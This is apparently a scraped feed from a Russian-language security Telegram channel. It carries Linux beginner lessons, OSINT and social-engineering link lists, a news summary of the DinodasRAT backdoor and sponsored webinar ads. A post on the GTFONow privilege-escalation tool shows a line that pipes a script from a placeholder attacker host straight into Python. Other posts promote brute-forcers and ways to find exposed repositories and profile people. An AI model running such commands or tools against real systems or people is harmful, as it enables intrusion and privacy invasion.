Крупнейшее сообщество по информационной безопасности. Взлом, защита от хакерских атак. IT-технологии. Kali Linux. Взлом ПК, взлом WiFi. Библиотека - @hacckingbook Новости - @Novostnik По любым вопросам сюда - @Adm1nGmz Услуги взлома НЕ ОКАЗЫВАЕМ!
Продолжаем, погружаться в мир #Linux с нашим бесплатным теоретическим курсом "Linux для новичков"!
#статья
Четвёртая серия материалов: "сетевые возможности Linux"
Конфигурация DNS-сервера в Linux: файл /etc/resolv.conf.
Первая серия материалов.
Вторая серия материалов.
Третья серия материалов.
LH | Новости | Курсы | Мемы
Как выглядит кибербезопасность сегодня: главные тренды, задачи и вызовы 2024 года?
Вместе c командой ИМБА ИТ найдем ответ 18 апреля на конференции «Цифровой щит: современные решения в области кибербезопасности»
• Как в текущих условиях обеспечить бесперебойную работу бизнеса: расскажем про тренды, актуальные российские ИБ-решения и инструменты реагирования на киберугрозы.
• Обсудим реалии соответствия требованиям законодательства в области ИБ.
😀 Свежий взгляд и актуальные решения проблем в ИБ, винное казино, фуршет, живая беседа с экспертами и многое другое!
👉 Подробности и регистрация — на сайте мероприятия.
Реклама. ООО «Инжиниринг Групп». Инн: 7736131037. Erid: 2VFNXW2YJRQ
Топ популярных постов за прошедшую неделю (сохрани себе и отправь другу):
1. Предыдущий топ статей
2. OSINT подборка №1
3. 3-я неделя обучения по Linux
4. GTFONow
5. OSINT подборка №2
6. Поиск уязвимых хостов с помощью LeakIX
7. OSINT подборка №3
8. Social Engineering
#подборка
LH | Новости | Курсы | Мемы
👁 OSINT
За последние несколько лет OSINT стал неотъемлемой частью работы разведывательных служб, бизнеса и исследователей. Этот метод сбора и анализа открытой информации из различных источников, таких как социальные сети, сайты, форумы и новостные ресурсы, позволяет получить ценные данные для выявления угроз, проведения расследований и принятия обоснованных решений. Давайте более подробно рассмотрим, как OSINT может быть полезен в различных сферах деятельности и какие технологии используются для его эффективного применения.
Подборка полезных материалов про OSINT #1
Подборка полезных материалов про OSINT #2
Подборка полезных материалов про OSINT #3
LH | Новости | Курсы | Мемы
#рекомендация
#рекомендации
#OSINT
Исследователи из Лаборатории Касперского сообщают об обнаружении в дикой природе Linux-версии многоплатформенного бэкдора под названием DinodasRAT, который был замечен в атаках на Китай, Тайвань, Турцию и Узбекистан.
DinodasRAT, также известный как XDealer, представляет собой вредоносное ПО на основе C++, позволяющее собирать широкий спектр конфиденциальных данных со скомпрометированных хостов.
В октябре 2023 года словацкая ESET наблюдала за кампанией кибершпионажа Operation Jacana, инициированной в отношении правительственных учреждений в Гайане с использованием Windows-версии рассматриваемого имплантата.
Как мы ранее сообщали, следы DinodasRAT в атаках, направленных с 2023 года на ряд госструктур по всему миру, также заметили исследователи Trend Micro, отслеживая APT Earth Krahang.
Вообще же DinodasRAT приписывают различным злоумышленникам, связанным Китаем, в том числе LuoYu, что может указывать на активный обмен инструментами среди указанной категории хакерских групп.
Лаборатория Касперского обнаружила версию вредоносного ПО для Linux (V10) в начале октября 2023 года. Собранные на данный момент данные показывают, что первый известный вариант (V7) датируется 2021 годом.
Он в основном предназначен для дистрибутивов на базе Red Hat и Ubuntu Linux.
После выполнения он устанавливает постоянство на хосте с помощью сценариев запуска SystemV или SystemD и периодически связывается с удаленным сервером через TCP или UDP для получения команд для запуска.
DinodasRAT способен выполнять файловые операции, изменять адреса C2, перечислять и завершать запущенные процессы, выполнять команды оболочки, загружать новую версию бэкдора и даже удалять себя.
Он также реализует меры, чтобы избежать детектирования с помощью инструментов отладки и мониторинга, и, как и его аналог для Windows, использует алгоритм Tiny Encryption Algorithm (TEA) для шифрования сообщений C2.
На момент анализа имплантата инфраструктура DinodasRAT для Linux, была полностью работоспособной.
Основная направленность DinodasRAT — получение и поддержание доступа через серверы Linux, а не разведка, как полагают исследователи ЛК.
Бэкдор полностью функционален, предоставляя оператору полный контроль над зараженной машиной, позволяя осуществлять кражу данных и шпионаж.
Более детальный анализ последних версий DinodasRAT с IOC доступен в отчете.
Social Engineering
Социальная инженерия – это метод манипуляции людьми с целью получения конфиденциальной информации или доступа к защищенным системам. Этот метод часто используется хакерами или мошенниками для достижения своих целей.
Понимание этого метода манипуляции и знание способов защиты от него поможет повысить уровень безопасности как в интернете, так и в реальной жизни. Надеемся, что данная подборка будет полезной для всех, кто хочет разобраться в этой теме.
• Социальная инженерия из первых рук.
• Социальная инженерия что это и как избежать.
• Социальная инженерия — методология проведения атак.
• Что означает социальная инженерия? Основы манипуляции.
• Социальная инженерия в Instagram.
• Социальная инженерия. Целенаправленные атаки. OSINT.
• Социальная инженерия. Практики, методы и инструменты для социотехнического тестирования. Часть 1
• Социальная инженерия. Практики, методы и инструменты для социотехнического тестирования. Часть 2
• Социальная инженерия. Атака на Сбербанк
• Методы социальной инженерии
• Взлом Facebook и Google с применением социальной инженерии
• Как взломать человека. Примеры социальной инженерии
• Социальная инженерия: как преступники эксплуатируют поведение человека
• Профайлинг и Социальная инженерия
• Взлом (Facebook.com VK.com Odnoklassniki.ru) или как Узнать пароль подружки!
• Автоматизация процесса сбора информации в социальной инженерии с помощью Rapportive
• Социальная инженерия. Целенаправленные атаки. OSINT
• Social Engineering - А что если...
• The Social-Engineer Toolkit.
• SET в Kali Linux для фишинговых атак
#подборка
LH | Новости | Курсы | Мемы
🏞 Каковы охотничьи угодья в краю киберпространства?
Знаете ли вы, что сегодня киберхищники берут не качеством, а количеством? В 2023 году произошло перераспределение в разбивке уровней критичности инцидентов, сделав этот период рекордным по количеству инцидентов низкой критичности, но в чем причина?
11 апреля в 11:00 (МСК) состоится вебинар «Сезон киберохоты: аналитика инцидентов за 2023 год», где эксперты «Лаборатории Касперского» представят новые аналитические отчеты Kaspersky MDR и Kaspersky Incident Response, и вы узнаете:
•О статистике инцидентов: какие регионы и отрасли находились в эпицентре киберугроз
•Самые свежие новости о тактиках, техниках и инструментах злоумышленников
•Как своевременно обнаруживать киберинциденты и эффективно на них реагировать
Каждый участник получит полные версии отчетов. И это еще не всё – на вебинаре состоится розыгрыш нескольких памятных подарков!
👉🏻 Зарегистрироваться на бесплатный вебинар
Реклама АО "Лаборатория Касперского". ИНН 7713140469
👁 OSINT
Продолжаем знакомить вас с увлекательным миром "OSINT" и предоставляем следующую порцию полезной информации на эту тему.
Подборка полезных материалов про OSINT #3:
• Топ 5 сервисов для определения геолокации по фото
• Orca – фреймворк для целевого OSINT
• Боевой Linux. Обзор самых мощных дистрибутивов для пентестов и OSINT
• Как узнать информацию о пользователе Telegram
• TorBot — интеллектуальный OSINT-инструмент с открытым исходным кодом, написанный на Python.
• Metaforge: инструмент анализа метаданных OSINT
• The Atypical OSINT Guide
• Zehef - инструмент osint для отслеживания электронной почты.
• 007-TheBond - OSINT инструмент, поможет вам собрать информацию о любом человеке.
• OSINT: поиск по электронный почте
• Seekr - Универсальный набор инструментов для сбора и управления OSINT-данными с удобным веб-интерфейсом.
• Сканируем сеть. Собираем информацию об организациях
• bbot — рекурсивный интернет-сканер для хакеров, вдохновленный Spiderfoot.
• Расширяем арсенал OSINT: Пять инструментов для анализа и поиска данных
• Обозреваем и практикуем популярные OSINT инструменты
Подборка полезных материалов про OSINT #1
Подборка полезных материалов про OSINT #2
#подборка
LH | Новости | Курсы | Мемы
Знали ли вы о том, что даже полузабытый инстанс IIS может быть использован злоумышленниками для закрепления? Нужно только.....
#статья
Как же хорошо, что любые энтерпрайз Windows-продукты имеют приятную возможность для расширения. Берите и пишите что хотите, когда хотите и как хотите! IIS — не исключение. Внутри него можно зарегистрировать DLLку, которая будет обрабатывать все HTTP-запросы. Казалось бы, обычный функционал? Но как злоумышленники могут использовать его в своих целях? Давайте разбираться на практике.
Материал можно почитать тут.
LH | Новости | Курсы | Мемы
Поиск уязвимых хостов с помощью LeakIX
Поисковая система, похожая на Shodan, с основным отличием - она ориентируется на разного рода утечки информации. Интересный способ, когда нужно по-быстрому проверить на некоторые типы уязвимостей. Например по запросу:+target_name +plugin:"GitConfigHttpPlugin"
Получим список хостов с открытыми .git
репозиториями, в которых, как известно, бывает немало полезной информации.
Есть и другие, не менее интересные плагины, список которых представлен тут.
Ссылка на сервис.
LH | Новости | Курсы | Мемы
#рекомендация
#рекомендации
👁 OSINT (от англ. Open-Source Intelligence) — это метод прикладной обработки информации, основанный на использовании информации, которая генерируется и доступна для публики. Например, с помощью OSINT вы можете найти много полезной информации на просторах интернета по тематике OSINT, но мы постарались и уже сделали подборку специально для Вас!
Подборка полезных материалов про OSINT #2:
• OSINT инструменты для Instagram и Facebook
• OSINT с FOCA: что можно узнать из публичных источников?
• CSI Linux. Полное руководство по OSINT. Часть 1. Domain Tools
• Сбор информации с помощью OSINT. Часть 1
• Сбор информации с помощью OSINT. Часть 2
• Поиск и анализ страниц ВКонтакте. OSINT и социальные сети
• Навыки OSINT(интернет-разведки) в кибербезопасности
• Учебное пособие OSINT для отслеживания информации о самолете и рейсе в режиме реального времени
• Ищем профиль по имени пользователя (OSINT)
• Комплексные инструменты OSINT. Сбор информации в сети
• Terra – инструмент OSINT для Twitter и Instagram
• Поиск в мире IoT. Альтернативы Shodan и Censys или OSINT по-китайски. Часть 1
• Комплексные инструменты OSINT. Сбор информации в сети. Часть 2
• Osint-San — инструмент, с которым можно стать кибердетективом
• Обзор Tsurugi Linux. Японское качество OSINT
• Как использовать sherlock
• Простой OSINT с использованием инструмента infooze V 1.0 [С примерами]
• Как выполнять OSINT в браузере с помощью Mitaka
• Сбор информации в Instagram с Osintgram на Kali Linux
• Открытый код. Мой топ 4 инструмента в сфере OSINT
• Открытый код. Инструменты OSINT.
• Telepathy - Набор инструментов для OSINT, позволяющий исследовать Telegram-чаты.
• Hunxploit04 – новый OSINT-инструмент для сбора
информации
• Maryam: Open-source Intelligence(OSINT) Framework
Подборка полезных материалов про OSINT #1
#подборка
LH | Новости | Курсы | Мемы
Reb, Blue, Yellow Team. Противостояние или партнёрство в киберпространстве
#статья
Сегодня поговорим с вами на тему, так называемых, команд в сфере информационной безопасности. В основном эта статья предназначена для тех, кто только начинает свой путь в этом направлении или просто до сих пор не определился к какой из "команд" он хочет примкнуть. Мы разберемся как команды и их совместная деятельность дополняют друг друга, и что они из себя представляют.
Читать статью.
LH | Новости | Курсы | Мемы
GTFONow
Данный инструмент предназначен для автоматической эскалации привилегий в Unix-подобных системах через команду sudo, также через атрибут SUID бинарных файлов в системе с использованием базы GTFOBins.
Возможности:
— Автоматическая эксплуатация неправильно настроенных разрешений sudo.
— Автоматическая эксплуатация неправильно настроенных разрешений suid, sgid.
— Автоматическая эксплуатация неправильных настроенных компонентов ОС.
— Автоматическая эксплуатация через SSH-ключи.
— Автоматическая эксплуатация через файл используемый в cron.
— Автоматическая эксплуатация через переменную окружения LD_PRELOAD.
— Легкий запуск без файлов с помощью curl http://attackerhost/gtfonow.py | python
Ссылка на GitHub.
LH | Новости | Курсы | Мемы
#рекомендация
#рекомендации
👁 OSINT (от англ. Open-Source Intelligence) — это метод прикладной обработки информации, основанный на использовании информации, которая генерируется и доступна для публики. Например, с помощью OSINT вы можете найти много полезной информации на просторах интернета по тематике OSINT, но мы постарались и уже сделали подборку специально для Вас!
Подборка полезных материалов про OSINT #1:
• Расширение OSINT Chrome: ThreatPinch Lookup.
• Сбор информации при помощи технологии OSINT в связке с DataSploit
• Сбор информации о человеке из открытых баз данных
• OSINT на платформе Telegram
• OSINT. Определение местоположения по фотографии. Глобальные и местные индикаторы. Часть 1
• OSINT. Определение местоположения по фотографии. Глобальные и местные индикаторы. Часть 2
• OSINT. Собираем информацию по Email
• Полезные и актуальные инструменты для OSINT
• Социальная инженерия. Целенаправленные атаки. OSINT
• OSINT. Инструменты для поиска информации о цели
• CSI Linux. Дистрибутив для кибер-расследований и OSINT
• Поиск (пробив) человека с помощью ботов Telegaram с наличием минимальной исходной информацией
• Offensive OSINT часть 1 - OSINT & RDP
• Offensive OSINT часть 2 - Деобфускация и анализ исходного кода + обнаружение сети распространения нелегального контента
• Offensive OSINT часть 3 - Ищем дезинформацию, связанную с выборами, на польском сервисе wykop.pl
• Поиск информации по номеру телефона.
Часть 1
• Разведка и сбора информации — обзор инструментария OSINT
• Snoop Project инструмент разведки на основе открытых данных (OSINT world)
• Инструменты OSINT, которые ускорят исследования в сети
#подборка
LH | Новости | Курсы | Мемы
Топ популярных постов за прошедшую неделю (сохрани себе и отправь другу):
1. Предыдущий топ статей
2. AWS
3. Обозреваем и практикуем популярные OSINT инструменты
4. Топ 5 инструментов для поиска уязвимостей и эксплоитов
5. Vault7 - огромная коллекция различных документов, публикуемых Wikileaks с 2017 года
6. LEGBA - это многопротокольный брутфорсер учетных данных
7. Attacking Docker
8. 𝗔𝗪𝗦 𝗢𝗦𝗜𝗡𝗧 𝗯𝘆 𝗗𝗼𝗿𝗸𝗶𝗻𝗴
#подборка
LH | Новости | Курсы | Мемы
Немного про построение векторов атак
#статья
Как правило, домен на базе Active Directory обладает значительным количеством объектов, свойств и связей между ними. В общем случае «вручную» выявить недостатки в настройке домена и на их основе построить вероятный вектор атаки является довольно трудоемкой задачей и справится с ней без вспомогательных программных средств не представляется возможным.
В настоящем материале будет представлен обзор некоторых программных средств, использующихся для автоматизированного построения вероятных атак в домене. Кроме того, будут рассмотрены некоторые подходы к улучшению уже имеющихся решений, а также предложен собственный алгоритм к выявлению наиболее приоритетных целей атак.
Ссылка на статью.
LH | Новости | Курсы | Мемы
ScrapedIn
#osint
Инструмент для парсинга LinkedIn без ограничений API для разведки данных. Можно быстро собирать инфу и парсить данные сразу в табличку XLSX.
Ссылка на GitHub.
LH | Новости | Курсы | Мемы
#рекомендация
#рекомендации
Продолжаем, погружаться в мир #Linux с нашим бесплатным теоретическим курсом "Linux для новичков"!
#статья
Четвёртая серия материалов: "сетевые возможности Linux"
Работа с удаленными хостами через SSH: подключение, передача файлов.
Первая серия материалов.
Вторая серия материалов.
Третья серия материалов.
LH | Новости | Курсы | Мемы
Увеличиваем Attack Surface на пентесте периметра
#статья
Типичная проблема: компании часто сами не подозревают, какие ресурсы у них могут «торчать наружу». А раз их может нарыть потенциальный злоумышленник — это проблема. На пентестах внешнего периметра не всегда сразу доступен полный скоуп IP-адресов, доменов и поддоменов. В таких случаях нам, пентестерам, приходится recon-ить все ресурсы компании. Ну и конечно же, чем больше скоуп, тем больше Attack Surface, тем больше потенциальных файндингов, в итоге — больше вероятность пробива периметра. Разберемся, что с этим делать.
Приятного чтения!
LH | Новости | Курсы | Мемы
Продолжаем, погружаться в мир #Linux с нашим бесплатным теоретическим курсом "Linux для новичков"!
#статья
Четвёртая серия материалов: "сетевые возможности Linux"
Конфигурация сетевых интерфейсов: команды ifconfig и ip.
Первая серия материалов.
Вторая серия материалов.
Третья серия материалов.
LH | Новости | Курсы | Мемы
Боты и сервисы для разведки данных Вконтакте
#статья
Продолжаю серию статей "ШХ" на тему OSINT. В прошлой статье рассмотрели варианты поиска по никнейму, благодаря которому смогли узнать почту и сопоставить аккаунты в социальных сетях.
Социальные сети стали неотъемлемой частью современной жизни, где люди активно делятся своими мыслями, фотографиями, интересами и информацией о себе. ВКонтакте, как одна из крупнейших платформ для общения, предоставляет уникальные возможности для проведения OSINT-исследования. Сегодня мы рассмотрим веб-ресурсы, ботов и методы поиска на примере социальной сети Вконтакте (VK).
Приятного чтения!
LH | Новости | Курсы | Мемы
Продолжаем, погружаться в мир #Linux с нашим бесплатным теоретическим курсом "Linux для новичков"!
#статья
Четвёртая серия материалов: "сетевые возможности Linux"
Проверка сетевого подключения: команда ping.
Первая серия материалов.
Вторая серия материалов.
Третья серия материалов.
LH | Новости | Курсы | Мемы
Атаки через почту. Как защититься?
По данным Positive technologies, 92% фишинговых атак начинаются с электронного письма. Важно постоянно тестировать почту на уязвимости, чтобы устранить основной вектор атак.
Positive Technologies представляет сервис для проверки безопасности почты – PT Knockin. Теперь вы можете за 2 минуты узнать, хорошо ли ваш ящик защищен от вредоносного ПО, а также получить рекомендации по улучшению работы средств защиты.
Симулятор атак на почту PT Knockin абсолютно безопасен для устройства и корпоративной сети. Бесплатно проверить защищенность корпоративной почты можно прямо сейчас – переходи на сайт!
[Проверить безопасность почты]
Продолжаем, погружаться в мир #Linux с нашим бесплатным теоретическим курсом "Linux для новичков"!
#статья
Четвёртая серия материалов: "сетевые возможности Linux"
Конфигурация сети в Linux: настройка IP-адреса, маски подсети, шлюза.
Первая серия материалов.
Вторая серия материалов.
Третья серия материалов.
LH | Новости | Курсы | Мемы
Нева-Автоматизация приглашает вас принять участие в вебинаре "Социальная инженерия VS Культура ИБ", который состоится 9 апреля в 11:00 мск.
На вебинаре вы узнаете о противодействии фишингу с помощью ПО StopPhish и специальных методик повышения осведомленности.
Каждый представитель подразделения ИБ понимает, что самое слабое звено в информационно безопасности – человек. Случается ли так, что ваши сотрудники попадаются на фишинг? Если да, то ждем вас на вебинаре, на котором представитель российского вендора StopPhish расскажет:
· Какую методологию повышения осведомленности он использует, чтобы сотрудники перестали жаловаться, что им мешают работать;
· Почему недостаточно просто иметь ПО для рассылки фишинговых писем и базу курсов;
· Как зародить культуру ИБ в организации и делать рядовых сотрудников союзниками;
· Возможности ПО StopPhish по снижению «попадаемости» на фишинг в 20–30 раз за 6 месяцев.
Помимо этого участники вебинара получат набор из 20 плакатов по ИБ, которые можно распечатать и повесить в организации.
StopPhish - российская ИТ-компания, разработчик платформы по повышению киберграмотности сотрудников, состоящей в Реестре ПО Минцифры. Благодаря накопленной экспертизе и методологии StopPhish помогает организациям снизить уязвимость перед фишингом в десятки раз. Среди клиентов компании: Банк России, Гознак, Ростех, Атомэнергомаш, СУЭК.
Спикеры:
• Юрий Другач, генеральный директор компании StopPhish
• Артем Кирокосян, специалист партнерского отдела StopPhish
Участие в вебинаре бесплатное. Предварительная регистрация обязательна: https://pruffme.com/landing/u3485261/tmp1710839492
До встречи 9 апреля в 11:00 мск
Решения «Лаборатории Касперского» для корпоративной защиты успешно прошли сертификацию ФСТЭК.
В начале этого года, решения Kaspersky Anti Targeted Attack и Kaspersky EDR Expert 6.0 обновили сертификат ФСТЭК, что позволяет использовать решения «Лаборатории Касперского» на объектах критической информационной инфраструктуры. О том, какие привилегии ещё ждут пользователей продуктов ЛК можно прочитать подробнее.
А уже в конце 2024 года Лаборатория Касперского планирует значительно усилить NDR-функциональность по анализу сетевого трафика, сетевого обнаружения и реагирования для платформы Kaspersky Anti Targeted Attack, следите за обновлениями!
Реклама АО "Лаборатория Касперского". ИНН 7713140469
Время сертификаций
Я уже не раз делился с вами ссылками и описанием бесплатных и полезных обучений и сертификаций из мира кибербезопасности (например, тут или здесь).
Я всё еще считаю, что зачастую сертификации – это какая-то оторванная от реальности сущность, которая и не особо нужна работодателям, и не приносит кому-то ощутимой пользы Она скорее заставляет именно вас изучить что-то новое (главное, чтобы там было что-то новое и полезное).
Так вот, я тут наткнулся на схемку, где расписано большинство сертификаций и их принадлежность к конкретным доменам в ИБ и IT. Всё, по классике, начинается в CompTIA Security+ и далее уже разрастается в ту степь, которая вам наиболее интересна. Да, тут есть не всё, но зато разложено по полочкам, а такое мы любим.
#Полезное
Твой Пакет Безопасности
На третьей неделе курса "Linux для новичков" мы изучили основные команды для управления пользователями и группами в Linux. Мы научились создавать и удалять пользователей и группы, управлять правами доступа, и познакомились с командами chroot и sudo.
Если вы что-то пропустили и желаете прочитать, то вот список материалов третей недели:Неделя 3: Управление пользователями и группами
•Создание и удаление пользователей в Linux: команды useradd и userdel.
•Управление паролями пользователей: команда passwd.
•Назначение пользователей в группы: команда usermod.
•Создание и удаление групп в Linux: команды groupadd и groupdel.
•Управление правами доступа к файлам и директориям для пользователей и групп.
•Просмотр информации о пользователях и группах: команды id, whoami и др.
•Ограничение доступа пользователей к определенным ресурсам: команды chroot и sudo.
Не забывайте следить и делиться нашим бесплатным курсом "Linux для новичков"!
Первая серия материалов.
Вторая серия материалов.
Следующую неделю мы посвятим теме «Сетевые возможности Linux».
LH | Новости | Курсы | Мемы
Академия CyberYozh откроет часть своих курсов бесплатно
В основном, это модули или части модулей их топовых продуктов. Материал стоящий, без воды. Вот, что точно стоит посмотреть 👀:
🙂 Hacker Point — самый масштабный практический курс в рунете, посвященный атаке на инфраструктуру компаний.
😎 Взлом антифрод систем — курс разоблачающий доходные схемы киберкриминала, различные методики обхода антифрод систем и как могут заработать честные пентестеры.
😂 Анонимность и безопасность 2.0 — чтобы вам не требовалось: пройти ли досмотр устройства на таможне (у жены), надежно защитить свои переписки, файлы или криптовалюту, проверить устройство на шпионаж — вам поможет этот курс.
🕘 Доступ обещают закрыть 14 апреля, так что торопитесь
Продолжаем, погружаться в мир #Linux с нашим бесплатным теоретическим курсом "Linux для новичков"!
#статья
Третья серия материалов: "Работа с файлами и директориями"
Ограничение доступа пользователей к определенным ресурсам: команды chroot и sudo.
Первая серия материалов.
Вторая серия материалов.
LH | Новости | Курсы | Мемы